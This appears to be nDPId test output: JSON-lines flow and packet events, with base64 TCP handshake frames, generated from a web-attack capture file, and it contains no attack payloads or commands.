+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1499347564211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347564211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87W5AAD4G2GGsEAABwKgKMuSoAFCF1MMXAAAAAKACchABawAAAgQFtAQCCAoBOy55AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":2,"flow_last_seen":1499347564212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347564212,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5KgQ0EVbhdTDGKAScSCoSwAAAgQFtAQCCAoD5P\/uATsueQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":3,"flow_last_seen":1499347564212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347564212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07W9AAD4G2GisEAABwKgKMuSoAFCF1MMYENBFXIAQAOVHUwAAAQEICgE7LnkD5P\/u"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347565457,"flow_last_seen":1499347565457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347565457,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1499347565457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347565457,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CLtAAD4GvRWsEAABwKgKMuS2AFBcaycLAAAAAKACchDFmwAAAgQFtAQCCAoBOy+wAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":2,"flow_last_seen":1499347565458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347565458,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5La+IYdMXGsnDKAScSB8AQAAAgQFtAQCCAoD5QEmATsvsAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4992,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":3,"flow_last_seen":1499347565458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347565458,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CLxAAD4GvRysEAABwKgKMuS2AFBcaycMviGHTYAQAOUbCQAAAQEICgE7L7AD5QEm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347566719,"flow_last_seen":1499347566719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566719,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1499347566719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347566719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bldAAD4GV3msEAABwKgKMuTEAFDBpl67AAAAAKACchAnZgAAAgQFtAQCCAoBOzDsAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":2,"flow_last_seen":1499347566719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347566719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5MTiLAwhwaZevKAScSAzsQAAAgQFtAQCCAoD5QJhATsw7AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":3,"flow_last_seen":1499347566720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347566720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0blhAAD4GV4CsEAABwKgKMuTEAFDBpl684iwMIoAQAOXSuAAAAQEICgE7MOwD5QJh"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347569321,"flow_last_seen":1499347569321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347569321,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1499347569321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g25AAD4GQmKsEAABwKgKMuTeAFCWQ7AYAAAAAKACchD+xwAAAgQFtAQCCAoBOzN2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5021,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":2,"flow_last_seen":1499347569321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347569321,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5N7q6xnjlkOwGaAScSDyBwAAAgQFtAQCCAoD5QTrATszdgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":3,"flow_last_seen":1499347569321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0g29AAD4GQmmsEAABwKgKMuTeAFCWQ7AZ6usZ5IAQAOWRDwAAAQEICgE7M3YD5QTr"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347570571,"flow_last_seen":1499347570571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347570571,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1499347570571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347570571,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l0FAAD4GLo+sEAABwKgKMuTsAFD4v6PuAAAAAKACchCnLgAAAgQFtAQCCAoBOzSvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":2,"flow_last_seen":1499347570571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347570571,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Ow6nDyd+L+j76AScSAmywAAAgQFtAQCCAoD5QYkATs0rwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":3,"flow_last_seen":1499347570572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347570572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l0JAAD4GLpasEAABwKgKMuTsAFD4v6PvOpw8noAQAOXF0gAAAQEICgE7NK8D5QYk"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347573065,"flow_last_seen":1499347573065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347573065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1499347573065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347573065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8STJAAD4GfJ6sEAABwKgKMuUGAFCilH4sAAAAAKACchAgkwAAAgQFtAQCCAoBOzceAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5054,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":2,"flow_last_seen":1499347573065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347573065,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Qbzm\/YPopR+LaAScSArTgAAAgQFtAQCCAoD5QiTATs3HgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5055,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":3,"flow_last_seen":1499347573066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347573066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0STNAAD4GfKWsEAABwKgKMuUGAFCilH4t85v2EIAQAOXKVQAAAQEICgE7Nx4D5QiT"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347574366,"flow_last_seen":1499347574366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347574366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1499347574366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347574366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8umZAAD4GC2qsEAABwKgKMuUaAFCmeIIFAAAAAKACchAXfQAAAgQFtAQCCAoBOzhjAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":2,"flow_last_seen":1499347574366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347574366,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5RoJ5n+MpniCBqAScSCBKwAAAgQFtAQCCAoD5QnZATs4YwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":3,"flow_last_seen":1499347574367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347574367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0umdAAD4GC3GsEAABwKgKMuUaAFCmeIIGCeZ\/jYAQAOUgMgAAAQEICgE7OGQD5QnZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347575652,"flow_last_seen":1499347575652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347575652,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1499347575652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347575652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XdZAAD4GZ\/qsEAABwKgKMuUoAFDuGWRzAAAAAKACchDsHQAAAgQFtAQCCAoBOzmlAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":2,"flow_last_seen":1499347575652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347575652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Sh6374H7hlkdKAScSClFgAAAgQFtAQCCAoD5QsaATs5pQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":3,"flow_last_seen":1499347575653,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347575653,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XddAAD4GaAGsEAABwKgKMuUoAFDuGWR0et++CIAQAOVEHgAAAQEICgE7OaUD5Qsa"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 